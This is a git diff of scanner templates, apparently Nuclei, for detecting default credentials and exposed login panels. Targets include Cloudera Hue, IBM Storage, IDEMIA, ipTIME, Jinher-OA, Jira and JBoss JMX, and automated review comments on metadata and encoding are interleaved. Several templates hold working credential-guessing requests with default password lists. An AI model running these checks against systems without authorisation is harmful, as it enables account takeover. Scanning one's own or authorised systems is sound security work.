name='csrfmiddlewaretoken' value='(.+?)' - req-condition: true - stop-at-first-match: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - contains(tolower(body_1), 'welcome to hue') - - contains(tolower(all_headers_2), 'csrftoken=') - - contains(tolower(all_headers_2), 'sessionid=') - condition: and - - type: status - status: - - 302 - -# Enhanced by mp on 2022/03/28 diff --git a/poc/auth/hue-default-credential.yaml b/poc/auth/hue-default-credential.yaml deleted file mode 100644 index f401f97a57..0000000000 --- a/poc/auth/hue-default-credential.yaml +++ /dev/null 
@@ -1,62 +0,0 @@ -id: hue-default-credential -info: - name: Cloudera Hue Default Admin Login - author: For3stCo1d - severity: high - description: Cloudera Hue default admin credentials were discovered. - reference: https://github.com/cloudera/hue - metadata: - shodan-query: title:"Hue - Welcome to Hue" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 - tags: hue,default-login,oss,cloudera -requests: - - raw: - - | - GET /hue/accounts/login?next=/ HTTP/1.1 - Host: {{Hostname}} - - | - POST /hue/accounts/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F - attack: pitchfork - payloads: - user: - - admin - - hue - - hadoop - - cloudera - pass: - - admin - - hue - - hadoop - - cloudera - cookie-reuse: true - extractors: - - type: regex - name: csrfmiddlewaretoken - part: body - internal: true - group: 1 - regex: - - name='csrfmiddlewaretoken' value='(.+?)' - req-condition: true - stop-at-first-match: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - contains(tolower(body_1), 'welcome to hue') - - contains(tolower(all_headers_2), 'csrftoken=') - - contains(tolower(all_headers_2), 'sessionid=') - condition: and - - type: status - status: - - 302 - -# Enhanced by mp on 2022/03/28 diff --git a/poc/auth/ibm-note-login-8110.yaml b/poc/auth/ibm-note-login-8112.yaml similarity index 100% rename from poc/auth/ibm-note-login-8110.yaml rename to poc/auth/ibm-note-login-8112.yaml diff --git a/poc/auth/ibm-storage-default-credential-8124.yaml b/poc/auth/ibm-storage-default-credential-8124.yaml index e018689a5d..2f4d8ef2f0 100644 --- a/poc/auth/ibm-storage-default-credential-8124.yaml +++ b/poc/auth/ibm-storage-default-credential-8124.yaml @@ -1,4 +1,5 @@ id: ibm-storage-default-login + info: name: IBM Storage Management Default Login author: madrobot 
@@ -10,8 +11,11 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + metadata: + max-request: 1 tags: default-login,ibm,storage -requests: + +http: - raw: - | POST /0/Authenticate HTTP/1.1 @@ -20,12 +24,14 @@ requests: Content-Type: application/x-www-form-urlencoded j_username={{username}}&j_password={{password}}&continue=&submit=submit+form + payloads: username: - admin password: - admin attack: pitchfork + matchers-condition: and matchers: - type: word @@ -34,12 +40,14 @@ requests: - "Property of IBM" condition: and part: body + - type: word words: - "JSESSIONID" part: header + - type: status status: - 200 -# Enhanced by mp on 2022/03/10 +# digest: 4a0a00473045022045caeb1423a85f3a5e1837c387a54cdba7ce85d5e7a15004f5a659ad8c5c60b5022100bdf5c8143053d33d9ee77931d4a8ad38dcbea0a50109515007e995a42f599a0b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ibm-storage-default-credential-8125.yaml b/poc/auth/ibm-storage-default-credential-8125.yaml index 2f4d8ef2f0..6717c8c319 100644 --- a/poc/auth/ibm-storage-default-credential-8125.yaml +++ b/poc/auth/ibm-storage-default-credential-8125.yaml @@ -1,21 +1,10 @@ id: ibm-storage-default-login - info: name: IBM Storage Management Default Login author: madrobot - severity: high - description: IBM Storage Management default admin login credentials were discovered. - reference: - - https://www.ibm.com/docs/en/power-sys-solutions/0008-ESS?topic=5148-starting-elastic-storage-server-management-server-gui - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - max-request: 1 + severity: medium tags: default-login,ibm,storage - -http: +requests: - raw: - | POST /0/Authenticate HTTP/1.1 
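Review bot: The first hunk of `ibm-storage-default-credential-8125.yaml` lowers `severity` from `high` to `medium` and deletes `description`, `reference` and the `classification` block (`cwe-id: CWE-522`), while the 8124 copy in this same commit keeps the content this file is moving away from. Both files declare `id: ibm-storage-default-login`, so the same admin/admin check will now be reported under one id with two severities, which breaks de-duplication and severity-based routing. Either keep `severity: high` and the removed `classification:` lines here, or drop one of the duplicate files. The same metadata stripping appears in the hunks for `idemia-biometrics-default-login-8138.yaml`, `iptime-default-login-8194.yaml` and `jupyter-ipython-unauth-8405.yaml`. The last hunk of this file also removes the `# digest:` line, so the copy can no longer be checked against a signature. The `requests:` block continues outside the hunk.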
@@ -24,14 +13,12 @@ http: Content-Type: application/x-www-form-urlencoded j_username={{username}}&j_password={{password}}&continue=&submit=submit+form - payloads: username: - admin password: - admin attack: pitchfork - matchers-condition: and matchers: - type: word @@ -40,14 +27,10 @@ http: - "Property of IBM" condition: and part: body - - type: word words: - "JSESSIONID" part: header - - type: status status: - 200 - -# digest: 4a0a00473045022045caeb1423a85f3a5e1837c387a54cdba7ce85d5e7a15004f5a659ad8c5c60b5022100bdf5c8143053d33d9ee77931d4a8ad38dcbea0a50109515007e995a42f599a0b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/icinga-web-login-8134.yaml b/poc/auth/icinga-web-login-8134.yaml new file mode 100644 index 0000000000..0ef7258a86 --- /dev/null +++ b/poc/auth/icinga-web-login-8134.yaml @@ -0,0 +1,22 @@ +id: icinga-web-login + +info: + name: Icinga Web 2 Login + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Icinga+Web+2+Login%22 + tags: panel,icinga + +requests: + - method: GET + path: + - '{{BaseURL}}/authentication/login' + + matchers-condition: and + matchers: + - type: word + words: + - "Icinga Web 2 Login" + - type: status + status: + - 200 diff --git a/poc/auth/icinga-web-login-8137.yaml b/poc/auth/icinga-web-login-8137.yaml deleted file mode 100644 index 5602ac406b..0000000000 --- a/poc/auth/icinga-web-login-8137.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: icinga-web-login - -info: - name: Icinga Web 2 Login - author: dhiyaneshDK - severity: info - metadata: - shodan-query: http.title:"Icinga Web 2 Login" - tags: panel,icinga - -requests: - - method: GET - path: - - '{{BaseURL}}/authentication/login' - - matchers-condition: and - matchers: - - type: word - words: - - "Icinga Web 2 Login" - - type: status - status: - - 200 diff --git a/poc/auth/icinga-web-login.yaml b/poc/auth/icinga-web-login.yaml index 4c7f3d265e..5602ac406b 100644 --- a/poc/auth/icinga-web-login.yaml 
+++ b/poc/auth/icinga-web-login.yaml @@ -1,20 +1,14 @@ id: icinga-web-login info: - name: Icinga Web 2 Login Panel - Detect + name: Icinga Web 2 Login author: dhiyaneshDK severity: info - description: Icinga Web 2 login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 metadata: - max-request: 1 shodan-query: http.title:"Icinga Web 2 Login" tags: panel,icinga -http: +requests: - method: GET path: - '{{BaseURL}}/authentication/login' @@ -24,9 +18,6 @@ http: - type: word words: - "Icinga Web 2 Login" - - type: status status: - 200 - -# digest: 4a0a00473045022100b93f1bc0afb3895ba775c85a240d2acb0a39e22f725c0e7d8e75ec71bf39e1aa022068d32d69ef34775c7343e9e5d1c9682834d4961df25a63fd9fb9019eb57eb7fe:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/idemia-biometrics-default-login-8138.yaml b/poc/auth/idemia-biometrics-default-login-8138.yaml index 819cd0e0c3..1a7ffa1347 100644 --- a/poc/auth/idemia-biometrics-default-login-8138.yaml +++ b/poc/auth/idemia-biometrics-default-login-8138.yaml @@ -1,18 +1,11 @@ id: idemia-biometrics-default-login - info: name: IDEMIA BIOMetrics Default Login author: Techryptic (@Tech) - severity: medium - description: IDEMIA BIOMetrics application default login credentials were discovered. + severity: high + description: Default Login of password=12345 on IDEMIA BIOMetrics application. reference: https://www.google.com/search?q=idemia+password%3D+"12345" tags: idemia,biometrics,default-login - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N - cvss-score: 5.8 - cve-id: - cwe-id: CWE-522 - requests: - raw: - | @@ -20,11 +13,9 @@ requests: Host: {{Hostname}} password={{password}} - payloads: password: - "12345" - matchers-condition: and matchers: - type: word 
@@ -32,15 +23,11 @@ requests: words: - "session_id=" - "resource" - - type: word part: body negative: true words: - "Invalid Password" - - type: status status: - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/idemia-biometrics-default-login-8139.yaml b/poc/auth/idemia-biometrics-default-login-8139.yaml deleted file mode 100644 index 1a7ffa1347..0000000000 --- a/poc/auth/idemia-biometrics-default-login-8139.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: idemia-biometrics-default-login -info: - name: IDEMIA BIOMetrics Default Login - author: Techryptic (@Tech) - severity: high - description: Default Login of password=12345 on IDEMIA BIOMetrics application. - reference: https://www.google.com/search?q=idemia+password%3D+"12345" - tags: idemia,biometrics,default-login -requests: - - raw: - - | - POST /cgi-bin/login.cgi HTTP/1.1 - Host: {{Hostname}} - - password={{password}} - payloads: - password: - - "12345" - matchers-condition: and - matchers: - - type: word - condition: and - words: - - "session_id=" - - "resource" - - type: word - part: body - negative: true - words: - - "Invalid Password" - - type: status - status: - - 200 diff --git a/poc/auth/idemia-biometrics-default-login.yaml b/poc/auth/idemia-biometrics-default-login-8141.yaml similarity index 100% rename from poc/auth/idemia-biometrics-default-login.yaml rename to poc/auth/idemia-biometrics-default-login-8141.yaml diff --git a/poc/auth/iptime-default-login-8193.yaml b/poc/auth/iptime-default-login-8193.yaml deleted file mode 100644 index 0cfc4b4f3d..0000000000 --- a/poc/auth/iptime-default-login-8193.yaml +++ /dev/null 
@@ -1,48 +0,0 @@ -id: iptime-default-login - -info: - name: ipTIME Default Login - author: gy741 - severity: high - description: ipTIME default admin credentials were discovered. - reference: - - https://www.freewebtools.com/IPTIME/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - max-request: 1 - tags: iptime,default-login - -http: - - raw: - - | - POST /sess-bin/login_handler.cgi HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}}/sess-bin/login_session.cgi - - username={{username}}&passwd={{password}} - - payloads: - username: - - admin - password: - - admin - attack: pitchfork - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "setCookie" - - "efm_session_id" - - "login.cgi" - part: body - condition: and - -# digest: 480a00453043021f48378eaeeba6c7b9c45cbe0a34e4f50162ecf7871700bb62a1183045ce49b402205d975fa7eabd5ad242a0eee4b7894233564acfe9e9b04ee5775e4d4ae57142e1:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/iptime-default-login-8194.yaml b/poc/auth/iptime-default-login-8194.yaml index a03c2cf675..024b8d62ab 100644 --- a/poc/auth/iptime-default-login-8194.yaml +++ b/poc/auth/iptime-default-login-8194.yaml @@ -3,13 +3,6 @@ info: name: ipTIME Default Login author: gy741 severity: high - description: ipTIME default admin credentials were discovered. - reference: - - https://www.freewebtools.com/IPTIME/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: iptime,default-login requests: - raw: @@ -37,5 +30,3 @@ requests: - "login.cgi" part: body condition: and - -# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/jellyseerr-login-panel.yaml b/poc/auth/jellyseerr-login-panel.yaml deleted file mode 100644 index 5bdb7987a0..0000000000 --- a/poc/auth/jellyseerr-login-panel.yaml +++ /dev/null 
@@ -1,39 +0,0 @@ -id: jellyseerr-login-panel - -info: - name: Jellyseerr Login Panel - Detect - author: ritikchaddha - severity: info - reference: - - https://github.com/Fallenbagel/jellyseerr - metadata: - verified: true - max-request: 2 - shodan-query: http.favicon.hash:-2017604252 - tags: panel,jellyseerr,detect - -http: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/login" - - stop-at-first-match: true - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Jellyseerr' - - 'content="Jellyseerr' - - 'applicationTitle":"Jellyseerr' - condition: or - - - type: status - status: - - 200 - -# digest: 490a004630440220216b9084def55b769cd30979959e20c1936b1bbfb21ba7f627c5f5f4ae3577cc022055317170baef7304b3c65636e266d0ce1fcf6b4c68d3de4a90caf0756bb717d0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jenkins-login-8277.yaml b/poc/auth/jenkins-login-8277.yaml deleted file mode 100644 index 4a36d85302..0000000000 --- a/poc/auth/jenkins-login-8277.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: jenkins-login -info: - name: Jenkins Login Detected - description: Jenkins is an open source automation server. - author: pdteam - severity: info - tags: panel,jenkins - remediation: Ensure proper access. - reference: https://www.jenkins.io/doc/book/security/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 -requests: - - method: GET - path: - - '{{BaseURL}}/login' - matchers-condition: and - matchers: - - type: word - words: - - 'Sign in [Jenkins]' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/10 diff --git a/poc/auth/jenkins-login-8280.yaml b/poc/auth/jenkins-login-8280.yaml new file mode 100644 index 0000000000..60dbd99b0c --- /dev/null +++ b/poc/auth/jenkins-login-8280.yaml 
@@ -0,0 +1,18 @@ +id: jenkins-login +info: + name: Jenkins Login + author: pdteam + severity: info + tags: panel,jenkins +requests: + - method: GET + path: + - '{{BaseURL}}/login' + matchers-condition: and + matchers: + - type: word + words: + - 'Sign in [Jenkins]' + - type: status + status: + - 200 diff --git a/poc/auth/jfrog-unauth-build-exposed-8299.yaml b/poc/auth/jfrog-unauth-build-exposed-8299.yaml new file mode 100644 index 0000000000..cdd0467066 --- /dev/null +++ b/poc/auth/jfrog-unauth-build-exposed-8299.yaml @@ -0,0 +1,30 @@ +id: jfrog-unauth-build-exposed +info: + name: JFrog Unauthentication Builds + author: dhiyaneshDK + severity: medium + reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml + tags: jfrog +requests: + - raw: + - | + POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name":"","before":"","after":"","direction":"desc","order_by":"date","num_of_rows":100} + matchers-condition: and + matchers: + - type: word + words: + - "last_build_number" + - "build_name" + condition: and + part: body + - type: word + words: + - application/json + part: header + - type: status + status: + - 200 diff --git a/poc/auth/jfrog-unauth-build-exposed-8302.yaml b/poc/auth/jfrog-unauth-build-exposed-8302.yaml index 95f977e802..63e5eb5c75 100644 --- a/poc/auth/jfrog-unauth-build-exposed-8302.yaml +++ b/poc/auth/jfrog-unauth-build-exposed-8302.yaml @@ -1,12 +1,11 @@ id: jfrog-unauth-build-exposed - info: name: JFrog Unauthentication Builds author: dhiyaneshDK severity: medium - reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml tags: jfrog - requests: - raw: - | 
@@ -15,7 +14,6 @@ requests: Content-Type: application/json {"name":"","before":"","after":"","direction":"desc","order_by":"date","num_of_rows":100} - matchers-condition: and matchers: - type: word @@ -24,12 +22,10 @@ requests: - "build_name" condition: and part: body - - type: word words: - application/json part: header - - type: status status: - 200 diff --git a/poc/auth/jinher-oa-default-login-8311.yaml b/poc/auth/jinher-oa-default-login-8311.yaml index 6be5f643d2..84e1e87e9b 100644 --- a/poc/auth/jinher-oa-default-login-8311.yaml +++ b/poc/auth/jinher-oa-default-login-8311.yaml @@ -1,11 +1,15 @@ id: jinher-oa-default-login info: - name: Jinher oa C6 Default Password + name: Jinher-OA C6 - Default Admin Discovery author: ritikchaddha severity: high - description: Jinher-OA C6 default administrator account credential. + description: Jinher-OA C6 default admin credentials were discovered. reference: - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E5%92%8COA-C6-default-password.md + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: jinher,default-login requests: - raw: @@ -36,3 +40,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/07/15 diff --git a/poc/auth/jinher-oa-default-login-8312.yaml b/poc/auth/jinher-oa-default-login-8312.yaml new file mode 100644 index 0000000000..91cbc784f4 --- /dev/null +++ b/poc/auth/jinher-oa-default-login-8312.yaml 
@@ -0,0 +1,52 @@ +id: jinher-oa-default-login + +info: + name: Jinher-OA C6 - Default Admin Discovery + author: ritikchaddha + severity: high + description: Jinher-OA C6 default admin credentials were discovered. + reference: + - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E5%92%8COA-C6-default-password.md + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 1 + tags: jinher,default-login + +http: + - raw: + - | + POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + type=login&loginCode={{base64("{{username}}")}}&pwd={{base64("{{password}}")}}& + + attack: pitchfork + payloads: + username: + - admin + password: + - "000000" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ϵͳ¹ÜÀíÔ±|" + - "ÄúºÃ|||" + condition: and + + - type: word + part: header + words: + - "SessionIDAdmin=" + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100c7f1aeb7fdb9213a70f5c33dbd33cb2e5f4445b1b3c8644668dfb733ae8e3f48022100ff616236d4f688db2f8267b1d09d2a573a8c6c266b7690b419697f88bdc8faf7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jira-login-default.yaml b/poc/auth/jira-login-default.yaml index 4b34037e6d..d3d14b37e6 100644 --- a/poc/auth/jira-login-default.yaml +++ b/poc/auth/jira-login-default.yaml @@ -8,10 +8,10 @@ info: reference: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: + max-request: 1 shodan-query: http.component:"Atlassian Jira" fofa-query: product="JIRA" tags: login-check,jira,creds-stuffing,self-hosted - variables: username: "{{username}}" password: "{{password}}" @@ -32,8 +32,8 @@ http: dsl: - username - password - attack: pitchfork + matchers-condition: and matchers: - type: word 
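Review bot: The body matcher in the new `jinher-oa-default-login-8312.yaml` uses the literals `"ϵͳ¹ÜÀíÔ±|"` and `"ÄúºÃ|||"`, which look like GBK-encoded text read as Latin-1 rather than intended characters. Whether they ever match depends on how the scanner decodes the response body. Because the block is `condition: and` under `matchers-condition: and`, a decoding mismatch becomes a silent false negative. The `SessionIDAdmin=` header matcher is the encoding-independent signal. At minimum, record the assumption next to the words, e.g. `# GBK response bytes shown as Latin-1 (presumably "系统管理员|" and "您好|||") - confirm against a known instance`.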
@@ -43,4 +43,6 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 + +# digest: 4a0a0047304502201b101496c1854e349bf95753e7cdfb3343d8599dc26efb543e4c3ceb2bb95e1f0221008648d8f4932d84b324ff6a350ea792a0ef1ef91a393292f43082173ccbb99a54:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jira-unauthenticated-dashboards-8323.yaml b/poc/auth/jira-unauthenticated-dashboards-8323.yaml index 8628c41074..f31db155cc 100644 --- a/poc/auth/jira-unauthenticated-dashboards-8323.yaml +++ b/poc/auth/jira-unauthenticated-dashboards-8323.yaml @@ -1,21 +1,15 @@ id: jira-unauthenticated-dashboards - # If public sharing is ON it allows users to share dashboards and filters with all users including -# those that are not logged in. Those dashboards and filters could reveal potentially sensitive information. +# those that are not logged in. Those dashboard and filters could reveal potentially sensitive information. info: name: Jira Unauthenticated Dashboards author: TechbrunchFR severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira - -http: +requests: - method: GET path: - "{{BaseURL}}/rest/api/2/dashboard?maxResults=100" - matchers: - type: word words: @@ -31,4 +25,3 @@ http: # If you change this setting, you will still need to update the existing filters and dashboards if they have already been # shared publicly. # Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. -# digest: 4a0a0047304502210082b7cb53987cdc653c9a8954733b3456da26355e585b238aa94d81e7938d77f302204de8001df94c11cc650f5ae455212a63c404a066cc29b911fd45686c3bde1a9e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jira-unauthenticated-dashboards-8327.yaml b/poc/auth/jira-unauthenticated-dashboards-8327.yaml index 54b3c68a6d..8628c41074 100644 --- a/poc/auth/jira-unauthenticated-dashboards-8327.yaml +++ b/poc/auth/jira-unauthenticated-dashboards-8327.yaml 
@@ -1,16 +1,21 @@ id: jira-unauthenticated-dashboards -# If public sharing is ON it allows users to share dashboards and filters with all users including +# If public sharing is ON it allows users to share dashboards and filters with all users including # those that are not logged in. Those dashboards and filters could reveal potentially sensitive information. info: name: Jira Unauthenticated Dashboards author: TechbrunchFR severity: info + metadata: + max-request: 1 + shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira -requests: + +http: - method: GET path: - "{{BaseURL}}/rest/api/2/dashboard?maxResults=100" + matchers: - type: word words: @@ -20,15 +25,10 @@ requests: condition: and # Remediation: - # Ensure that this permission is restricted to specific groups that require it. - # You can restrict it in Administration > System > Global Permissions. - # Turning the feature off will not affect existing filters and dashboards. - # If you change this setting, you will still need to update the existing filters and dashboards if they have already been - # shared publicly. - # Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. +# digest: 4a0a0047304502210082b7cb53987cdc653c9a8954733b3456da26355e585b238aa94d81e7938d77f302204de8001df94c11cc650f5ae455212a63c404a066cc29b911fd45686c3bde1a9e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jira-unauthenticated-installed-gadgets-8328.yaml b/poc/auth/jira-unauthenticated-installed-gadgets-8328.yaml index da56b71092..bb38dd61ea 100644 --- a/poc/auth/jira-unauthenticated-installed-gadgets-8328.yaml +++ b/poc/auth/jira-unauthenticated-installed-gadgets-8328.yaml 
@@ -1,17 +1,14 @@ id: jira-unauthenticated-installed-gadgets - info: name: Jira Unauthenticated Installed gadgets author: philippedelteil severity: info description: Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets) tags: atlassian,jira - requests: - method: GET path: - "{{BaseURL}}/rest/config/1.0/directory" - redirects: true max-redirects: 2 matchers-condition: and @@ -19,7 +16,6 @@ requests: - type: word words: - 'jaxbDirectoryContents' - - type: status status: - 200 diff --git a/poc/auth/jira-unauthenticated-installed-gadgets-8330.yaml b/poc/auth/jira-unauthenticated-installed-gadgets-8330.yaml new file mode 100644 index 0000000000..58e5fb36b6 --- /dev/null +++ b/poc/auth/jira-unauthenticated-installed-gadgets-8330.yaml @@ -0,0 +1,31 @@ +id: jira-unauthenticated-installed-gadgets + +info: + name: Jira Unauthenticated Installed gadgets + author: philippedelteil + severity: info + description: Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets) + metadata: + max-request: 1 + shodan-query: http.component:"Atlassian Jira" + tags: atlassian,jira + +http: + - method: GET + path: + - "{{BaseURL}}/rest/config/1.0/directory" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'jaxbDirectoryContents' + + - type: status + status: + - 200 + +# digest: 4a0a0047304502210099f7859c8f6312ba07f43ba7d80b6ced1937f1ffc2ae555b1ae5d11f1cdc797d02207e68b09ecc7c8f7767224d8b8e07d539a312323747af7ba36059c9c5bdb4a5c9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jira-unauthenticated-popular-filters-8331.yaml b/poc/auth/jira-unauthenticated-popular-filters-8331.yaml deleted file mode 100644 index 0049e91b4e..0000000000 --- a/poc/auth/jira-unauthenticated-popular-filters-8331.yaml +++ /dev/null 
@@ -1,23 +0,0 @@ -id: jira-unauthenticated-popular-filters - -info: - name: Jira Unauthenticated Popular Filters - author: TechbrunchFR - severity: Info - -requests: - - method: GET - path: - - "{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular" - matchers: - - type: word - words: - - 'filterlink_' - -# Remediation: -# Ensure that this permission is restricted to specific groups that require it. -# You can restrict it in Administration > System > Global Permissions. -# Turning the feature off will not affect existing filters and dashboards. -# If you change this setting, you will still need to update the existing filters and dashboards if they have already been -# shared publicly. -# Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. diff --git a/poc/auth/jira-unauthenticated-popular-filters.yaml b/poc/auth/jira-unauthenticated-popular-filters.yaml index 304d20f9a0..6fbda02ff3 100644 --- a/poc/auth/jira-unauthenticated-popular-filters.yaml +++ b/poc/auth/jira-unauthenticated-popular-filters.yaml @@ -1,9 +1,8 @@ -id: jira-unauth-popular-filters +id: jira-unauthenticated-popular-filters info: name: Jira Unauthenticated Popular Filters author: TechbrunchFR - severity: info - tags: atlassian,jira + severity: Info requests: - method: GET path: diff --git a/poc/auth/jira-unauthenticated-projectcategories-8334.yaml b/poc/auth/jira-unauthenticated-projectcategories-8334.yaml index 3d65baf18e..ff6dcd5d49 100644 --- a/poc/auth/jira-unauthenticated-projectcategories-8334.yaml +++ b/poc/auth/jira-unauthenticated-projectcategories-8334.yaml @@ -4,12 +4,9 @@ info: name: Jira Unauthenticated Project Categories author: TESS severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira -http: +requests: - method: GET path: - "{{BaseURL}}/rest/api/2/projectCategory?maxResults=1000" 
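Review bot: The hunk for `jira-unauthenticated-popular-filters.yaml` removes `tags: atlassian,jira` and changes `severity: info` to `severity: Info`, so the template drops out of tag-filtered runs and no longer matches the lowercase severity used by the other Jira templates in this commit. Whether the capitalised value is normalised depends on the loader, so keeping `severity: info` and `tags: atlassian,jira` avoids relying on that. The `id` also changes from `jira-unauth-popular-filters` to `jira-unauthenticated-popular-filters`, which will orphan any baseline, suppression or exclusion list keyed on the old id. The request and matcher blocks continue outside the hunk.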
@@ -31,5 +28,3 @@ http: part: header words: - "atlassian.xsrf.token" - -# digest: 4b0a004830460221008f66b3babbdae57b4672c9d6216a67a6b8ca43341b00e673ace120d7b57348410221008bf9c86ab7e3683d0bf6c23dfd9d5220bdd0f070bcb849fbc025127939852ebd:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jira-unauthenticated-projectcategories-8332.yaml b/poc/auth/jira-unauthenticated-projectcategories.yaml similarity index 100% rename from poc/auth/jira-unauthenticated-projectcategories-8332.yaml rename to poc/auth/jira-unauthenticated-projectcategories.yaml diff --git a/poc/auth/jira-unauthenticated-user-picker-8341.yaml b/poc/auth/jira-unauthenticated-user-picker-8341.yaml index 0a88ec36aa..0ce9858072 100644 --- a/poc/auth/jira-unauthenticated-user-picker-8341.yaml +++ b/poc/auth/jira-unauthenticated-user-picker-8341.yaml @@ -1,22 +1,14 @@ id: jira-unauthenticated-user-picker - info: name: Jira Unauthenticated User Picker author: TechbrunchFR severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira - -http: +requests: - method: GET path: - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa" - matchers: - type: word words: - 'user-picker' - -# digest: 490a0046304402200087bccdda4eb25b5110e1333de30442f5744e55aa8f2b5db3cf5d01c54e3837022068d85868176036eb3b1420b5aa186064b791ca1486a60f7e1c8fed872ad1f402:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jmx-default-login-8355.yaml b/poc/auth/jmx-default-login-8355.yaml deleted file mode 100644 index de4e66a812..0000000000 --- a/poc/auth/jmx-default-login-8355.yaml +++ /dev/null 
@@ -1,38 +0,0 @@ -id: jmx-default-login - -info: - name: JBoss JMX Console Weak Credential - author: paradessia - severity: high - tags: jboss,jmx,default-login - -requests: - - raw: - - | - GET /jmx-console/ HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(user + ':' + pass)}} - - attack: clusterbomb - payloads: - user: - - admin - - root - pass: - - admin - - 12345 - - 123456 - - 1234 - - 123456789 - - 123qwe - - root - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'JMImplementation' diff --git a/poc/auth/jmx-default-login.yaml b/poc/auth/jmx-default-login.yaml new file mode 100644 index 0000000000..ddf2035a6c --- /dev/null +++ b/poc/auth/jmx-default-login.yaml @@ -0,0 +1,42 @@ +id: jmx-default-login +info: + name: JBoss JMX Console Weak Credential Discovery + author: paradessia + severity: high + description: JBoss JMX Console default login information was discovered. + reference: + - https://docs.jboss.org/jbossas/6/Admin_Console_Guide/en-US/html/Administration_Console_User_Guide-Accessing_the_Console.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: jboss,jmx,default-login +requests: + - raw: + - | + GET /jmx-console/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(user + ':' + pass)}} + attack: clusterbomb + payloads: + user: + - admin + - root + pass: + - admin + - 12345 + - 123456 + - 1234 + - 123456789 + 